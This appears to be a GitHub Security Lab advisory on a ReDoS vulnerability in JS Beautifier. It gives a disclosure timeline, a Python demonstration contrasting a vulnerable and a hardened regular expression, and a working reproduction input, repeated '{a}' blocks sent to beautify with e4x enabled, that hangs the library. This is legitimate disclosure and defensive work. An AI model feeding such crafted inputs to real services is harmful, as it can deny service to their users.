Coordinated Disclosure Timeline
- 2021-08-31: Sent report to bitwiseman@beautifier.io
- 2021-10-14: They have code scanning enabled, so this bug is listed in their code scanning results.
- 2021-10-14: Sent a follow-up email to bitwiseman@beautifier.io with my suggested fix.
- 2021-11-30: Disclosure deadline expired.
- 2021-12-06: Created a pull request to fix the bug, but it turned out that my fix was incorrect.
- 2021-12-09: Created a new pull request to fix the bug, which was successful.
Summary
JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
JS Beautifier
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions: a backtracking matcher can take super-linear (often exponential) time on a crafted input string, so an attacker who controls the input can tie up the CPU with a short payload.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on JS Beautifier by following this link.
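The following is an added illustration of the failure mode, not code from the advisory or from JS Beautifier, and the pattern it uses (VULNERABLE) is a constructed stand-in rather than the project's regular expression. It has the same shape of ambiguity that the PoC input below exploits: a repeated group whose two alternatives can both consume a "{a}" chunk, either as one unit or character by character, so an input that is never terminated by ">" forces Python's backtracking engine to try every one of the 2**n ways of splitting it. HARDENED, redos_input, match_tag and time_match are names chosen here for the example.

```python
import re
import time

# Constructed stand-in for a ReDoS-prone pattern (NOT the JS Beautifier regex).
# Inside the repeated group, "{a}" can be matched by the first alternative as one
# unit, or by the second alternative one character at a time, so a failing match
# explores 2**n splits of n "{a}" chunks before giving up.
VULNERABLE = re.compile(r"<(?:\{[^}]*\}|[^<>])*>")

# Hardened form: "{" is removed from the character-class alternative, so at every
# position exactly one alternative can apply and a failing match backtracks in
# linear time. Trade-off: an unclosed "{" no longer matches at all (see the
# assertions in the usage note), which is the kind of behavioural change that a
# project's test-suite has to confirm before the fix is accepted.
HARDENED = re.compile(r"<(?:\{[^}]*\}|[^<>{])*>")


def redos_input(n):
    """Constructed attacker input: n '{a}' chunks after '<' and no closing '>'."""
    return "<" + "{a}" * n


def match_tag(pattern, text):
    """Return the matched text, or None when the pattern does not match."""
    m = pattern.match(text)
    return m.group(0) if m else None


def time_match(pattern, text):
    """Seconds spent in one pattern.match(text) call; the result is discarded."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    benign = "<{x} {y}>"
    print("benign input:", match_tag(VULNERABLE, benign), match_tag(HARDENED, benign))
    # Each +4 in n multiplies the vulnerable matcher's work by 16; the hardened
    # pattern stays flat.
    for n in (10, 14, 18):
        crafted = redos_input(n)
        print(f"n={n:2d}  vulnerable: {time_match(VULNERABLE, crafted):8.4f}s"
              f"  hardened: {time_match(HARDENED, crafted):8.6f}s")
```

On well-formed input both patterns return the same match, and on the crafted input the hardened pattern rejects in microseconds while the constructed vulnerable one grows exponentially with n. Note that HARDENED rejects an unclosed "{" (for example "<{>") that VULNERABLE accepts: removing ambiguity from a regular expression usually changes what it accepts at the edges, which is why a candidate fix must be run against the project's own tests, as the timeline above reflects.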
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install jsbeautifier:
pip3 install jsbeautifier
- Run the below with python3:
import jsbeautifier

# XML-literal (E4X) input: repeated "{a}" blocks ending in an unterminated "{>"
source = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''
# The e4x option enables handling of XML literals, which is the code path that
# reaches the vulnerable regular expression; this call does not return in reasonable time.
print(jsbeautifier.beautify(source, {'e4x': True}))
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-113 in any communication regarding this issue.